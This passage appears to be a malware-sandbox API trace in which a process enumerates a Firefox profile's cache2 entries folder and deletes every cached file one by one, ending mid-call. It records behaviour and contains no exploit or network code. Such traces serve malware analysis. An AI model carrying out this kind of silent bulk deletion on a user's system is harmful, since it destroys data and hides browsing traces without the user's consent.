[0253.755] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.755] lstrlenW (lpString="48D18A403364708B74676D0C5068809EE47BCF43") returned 40 [0253.756] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="48D18A403364708B74676D0C5068809EE47BCF43" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\48D18A403364708B74676D0C5068809EE47BCF43") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\48D18A403364708B74676D0C5068809EE47BCF43" [0253.756] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\48D18A403364708B74676D0C5068809EE47BCF43" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\48d18a403364708b74676d0c5068809ee47bcf43")) returned 1 [0253.757] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.757] lstrlenW (lpString="491836973BD7F16266314A8709EF00934A1BFCA0") returned 40 [0253.757] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="491836973BD7F16266314A8709EF00934A1BFCA0" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\491836973BD7F16266314A8709EF00934A1BFCA0") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\491836973BD7F16266314A8709EF00934A1BFCA0" [0253.757] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\491836973BD7F16266314A8709EF00934A1BFCA0" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\491836973bd7f16266314a8709ef00934a1bfca0")) returned 1 [0253.757] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.757] lstrlenW (lpString="491FFC0D1E910DC1DB3107E7DA730B43A97010A0") returned 40 [0253.757] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="491FFC0D1E910DC1DB3107E7DA730B43A97010A0" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\491FFC0D1E910DC1DB3107E7DA730B43A97010A0") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\491FFC0D1E910DC1DB3107E7DA730B43A97010A0" [0253.758] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\491FFC0D1E910DC1DB3107E7DA730B43A97010A0" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\491ffc0d1e910dc1db3107e7da730b43a97010a0")) returned 1 [0253.759] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.759] lstrlenW (lpString="4A46AC76F0CCC4293CC380999116F3B7911F85BE") returned 40 [0253.759] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="4A46AC76F0CCC4293CC380999116F3B7911F85BE" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4A46AC76F0CCC4293CC380999116F3B7911F85BE") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4A46AC76F0CCC4293CC380999116F3B7911F85BE" [0253.759] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4A46AC76F0CCC4293CC380999116F3B7911F85BE" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\4a46ac76f0ccc4293cc380999116f3b7911f85be")) returned 1 [0253.759] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.759] lstrlenW (lpString="4B18B5ADA8BF2E475961694931BE215AED8ECBD5") returned 40 [0253.759] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="4B18B5ADA8BF2E475961694931BE215AED8ECBD5" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4B18B5ADA8BF2E475961694931BE215AED8ECBD5") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4B18B5ADA8BF2E475961694931BE215AED8ECBD5" [0253.759] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4B18B5ADA8BF2E475961694931BE215AED8ECBD5" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\4b18b5ada8bf2e475961694931be215aed8ecbd5")) returned 1 [0253.760] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.760] lstrlenW (lpString="4B2A0DFA12FEADFF375261309F704B43534BEE37") returned 40 [0253.760] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="4B2A0DFA12FEADFF375261309F704B43534BEE37" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4B2A0DFA12FEADFF375261309F704B43534BEE37") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4B2A0DFA12FEADFF375261309F704B43534BEE37" [0253.760] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4B2A0DFA12FEADFF375261309F704B43534BEE37" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\4b2a0dfa12feadff375261309f704b43534bee37")) returned 1 [0253.761] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.761] lstrlenW (lpString="4BB6AC032612F432B6B5DA43EE2DAA6A8A03B6F4") returned 40 [0253.761] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="4BB6AC032612F432B6B5DA43EE2DAA6A8A03B6F4" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4BB6AC032612F432B6B5DA43EE2DAA6A8A03B6F4") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4BB6AC032612F432B6B5DA43EE2DAA6A8A03B6F4" [0253.761] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4BB6AC032612F432B6B5DA43EE2DAA6A8A03B6F4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\4bb6ac032612f432b6b5da43ee2daa6a8a03b6f4")) returned 1 [0253.761] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.761] lstrlenW (lpString="4C7EAEF07520B2C9900CFE06971368FF939AA197") returned 40 [0253.761] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="4C7EAEF07520B2C9900CFE06971368FF939AA197" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4C7EAEF07520B2C9900CFE06971368FF939AA197") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4C7EAEF07520B2C9900CFE06971368FF939AA197" [0253.761] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4C7EAEF07520B2C9900CFE06971368FF939AA197" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\4c7eaef07520b2c9900cfe06971368ff939aa197")) returned 1 [0253.762] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.762] lstrlenW (lpString="4CAD791F9C35BB747A46BAC7BE30A1E3BC028262") returned 40 [0253.762] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="4CAD791F9C35BB747A46BAC7BE30A1E3BC028262" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4CAD791F9C35BB747A46BAC7BE30A1E3BC028262") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4CAD791F9C35BB747A46BAC7BE30A1E3BC028262" [0253.762] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4CAD791F9C35BB747A46BAC7BE30A1E3BC028262" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\4cad791f9c35bb747a46bac7be30a1e3bc028262")) returned 1 [0253.764] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.764] lstrlenW (lpString="4CF1AED5BBD3500653D8E2D1ACE09C58CF2D6182") returned 40 [0253.764] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="4CF1AED5BBD3500653D8E2D1ACE09C58CF2D6182" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4CF1AED5BBD3500653D8E2D1ACE09C58CF2D6182") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4CF1AED5BBD3500653D8E2D1ACE09C58CF2D6182" [0253.764] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4CF1AED5BBD3500653D8E2D1ACE09C58CF2D6182" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\4cf1aed5bbd3500653d8e2d1ace09c58cf2d6182")) returned 1 [0253.764] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.764] lstrlenW (lpString="4DCE88D30F65C9460CC26665BC0A65F3234FA3D4") returned 40 [0253.764] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="4DCE88D30F65C9460CC26665BC0A65F3234FA3D4" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4DCE88D30F65C9460CC26665BC0A65F3234FA3D4") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4DCE88D30F65C9460CC26665BC0A65F3234FA3D4" [0253.764] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4DCE88D30F65C9460CC26665BC0A65F3234FA3D4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\4dce88d30f65c9460cc26665bc0a65f3234fa3d4")) returned 1 [0253.765] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.765] lstrlenW (lpString="4DEBFBF420A31CFDD61418B1BE3ADB580389730E") returned 40 [0253.765] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="4DEBFBF420A31CFDD61418B1BE3ADB580389730E" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4DEBFBF420A31CFDD61418B1BE3ADB580389730E") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4DEBFBF420A31CFDD61418B1BE3ADB580389730E" [0253.766] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4DEBFBF420A31CFDD61418B1BE3ADB580389730E" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\4debfbf420a31cfdd61418b1be3adb580389730e")) returned 1 [0253.767] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.768] lstrlenW (lpString="4EFB15999EE57EDBFAADF69D6A31D8C6F90FE8DC") returned 40 [0253.768] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="4EFB15999EE57EDBFAADF69D6A31D8C6F90FE8DC" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4EFB15999EE57EDBFAADF69D6A31D8C6F90FE8DC") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4EFB15999EE57EDBFAADF69D6A31D8C6F90FE8DC" [0253.768] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4EFB15999EE57EDBFAADF69D6A31D8C6F90FE8DC" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\4efb15999ee57edbfaadf69d6a31d8c6f90fe8dc")) returned 1 [0253.769] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.769] lstrlenW (lpString="4F0C54EEF677196E2899E5E79B4F3A906E46F926") returned 40 [0253.769] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="4F0C54EEF677196E2899E5E79B4F3A906E46F926" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4F0C54EEF677196E2899E5E79B4F3A906E46F926") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4F0C54EEF677196E2899E5E79B4F3A906E46F926" [0253.770] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4F0C54EEF677196E2899E5E79B4F3A906E46F926" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\4f0c54eef677196e2899e5e79b4f3a906e46f926")) returned 1 [0253.770] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.770] lstrlenW (lpString="4F21DDD23480F1D4FBA13115BADB18B9AD18D8B1") returned 40 [0253.770] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="4F21DDD23480F1D4FBA13115BADB18B9AD18D8B1" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4F21DDD23480F1D4FBA13115BADB18B9AD18D8B1") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4F21DDD23480F1D4FBA13115BADB18B9AD18D8B1" [0253.770] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4F21DDD23480F1D4FBA13115BADB18B9AD18D8B1" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\4f21ddd23480f1d4fba13115badb18b9ad18d8b1")) returned 1 [0253.771] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.771] lstrlenW (lpString="4F372C9418B79051ABED288900CDF3D20C12F38C") returned 40 [0253.771] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="4F372C9418B79051ABED288900CDF3D20C12F38C" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4F372C9418B79051ABED288900CDF3D20C12F38C") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4F372C9418B79051ABED288900CDF3D20C12F38C" [0253.771] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4F372C9418B79051ABED288900CDF3D20C12F38C" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\4f372c9418b79051abed288900cdf3d20c12f38c")) returned 1 [0253.772] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.772] lstrlenW (lpString="4F680E68B8C682B5D2540FA7BE7B7F0D7521D9C9") returned 40 [0253.772] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="4F680E68B8C682B5D2540FA7BE7B7F0D7521D9C9" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4F680E68B8C682B5D2540FA7BE7B7F0D7521D9C9") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4F680E68B8C682B5D2540FA7BE7B7F0D7521D9C9" [0253.772] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4F680E68B8C682B5D2540FA7BE7B7F0D7521D9C9" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\4f680e68b8c682b5d2540fa7be7b7f0d7521d9c9")) returned 1 [0253.773] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.773] lstrlenW (lpString="4F78D1F2D9B48D34C6259CF59FD5E171B97EFB3A") returned 40 [0253.773] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="4F78D1F2D9B48D34C6259CF59FD5E171B97EFB3A" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4F78D1F2D9B48D34C6259CF59FD5E171B97EFB3A") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4F78D1F2D9B48D34C6259CF59FD5E171B97EFB3A" [0253.773] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4F78D1F2D9B48D34C6259CF59FD5E171B97EFB3A" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\4f78d1f2d9b48d34c6259cf59fd5e171b97efb3a")) returned 1 [0253.773] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.773] lstrlenW (lpString="4FC872C4A3A8739207D005A676C19DAB518FA53B") returned 40 [0253.773] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="4FC872C4A3A8739207D005A676C19DAB518FA53B" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4FC872C4A3A8739207D005A676C19DAB518FA53B") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4FC872C4A3A8739207D005A676C19DAB518FA53B" [0253.773] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4FC872C4A3A8739207D005A676C19DAB518FA53B" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\4fc872c4a3a8739207d005a676c19dab518fa53b")) returned 1 [0253.774] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.774] lstrlenW (lpString="514D7C625328106E43CEC7FD7CF71AEDA0A3101F") returned 40 [0253.774] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="514D7C625328106E43CEC7FD7CF71AEDA0A3101F" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\514D7C625328106E43CEC7FD7CF71AEDA0A3101F") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\514D7C625328106E43CEC7FD7CF71AEDA0A3101F" [0253.774] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\514D7C625328106E43CEC7FD7CF71AEDA0A3101F" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\514d7c625328106e43cec7fd7cf71aeda0a3101f")) returned 1 [0253.775] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.775] lstrlenW (lpString="522FF036651FEA29F227BFB14BD934175DDBA62A") returned 40 [0253.775] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="522FF036651FEA29F227BFB14BD934175DDBA62A" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\522FF036651FEA29F227BFB14BD934175DDBA62A") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\522FF036651FEA29F227BFB14BD934175DDBA62A" [0253.775] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\522FF036651FEA29F227BFB14BD934175DDBA62A" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\522ff036651fea29f227bfb14bd934175ddba62a")) returned 1 [0253.775] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.775] lstrlenW (lpString="5289F8C4AB5388DE2FCD562674EDF6674FB6DD30") returned 40 [0253.775] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="5289F8C4AB5388DE2FCD562674EDF6674FB6DD30" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5289F8C4AB5388DE2FCD562674EDF6674FB6DD30") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5289F8C4AB5388DE2FCD562674EDF6674FB6DD30" [0253.775] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\5289F8C4AB5388DE2FCD562674EDF6674FB6DD30" (normalized: 